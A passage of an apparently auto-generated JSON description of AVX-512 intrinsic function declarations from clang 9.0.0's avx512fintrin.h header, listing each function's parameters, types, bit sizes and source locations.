"parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_compressstoreu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8986:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_compressstoreu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8993:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_compressstoreu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9000:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_cvtsd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9025:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_cvtsd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9034:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_cvtss_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9098:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_cvtss_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9107:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cvtu32_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9116:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cvtu64_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9128:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cvtu32_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9140:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtu64_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9152:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm512_mask_set1_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_set1_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9168:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9176:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__e63", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e62", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e61", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e60", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e59", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e58", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e57", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e56", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e55", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e54", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e53", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e52", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e51", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e50", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e49", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e48", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e47", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e46", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e45", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e44", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e43", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e42", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e41", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e40", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e39", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e38", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e37", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e36", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e35", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e34", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e33", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e32", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e31", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e30", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e29", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e28", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e27", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e26", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e25", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e24", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e23", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e22", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e21", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e20", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e19", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e18", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e17", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e16", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e15", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e14", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e13", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e12", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e11", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e10", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e9", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e8", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e7", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e6", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e5", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e4", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e3", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e2", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e1", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__e0", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__e31", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e30", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e29", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e28", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e27", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e26", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e25", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e24", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e23", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e22", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e21", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e20", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e19", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e18", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e17", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e16", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e15", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e14", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e13", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e12", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e11", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e10", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e9", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e8", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e7", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e6", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e5", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e4", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e3", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e2", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e1", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__e0", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9215:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__E", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__F", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__G", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__H", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__I", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__J", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__K", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__L", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__M", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__N", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__O", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9231:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__E", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__F", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__G", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__H", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9243:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__E", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__F", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__G", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__H", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_set_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__E", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__F", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__G", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__H", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__I", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__J", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__K", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__L", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__M", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__N", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__O", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_abs_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9269:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_abs_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9275:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__K", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_abs_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9281:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_abs_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9287:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__K", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_reduce_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9313:51", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_mul_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9317:51", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9321:51", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9325:51", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9330:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_mul_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9336:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9342:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9348:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9365:48", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9369:48", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9374:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9380:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9405:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9410:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9415:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", 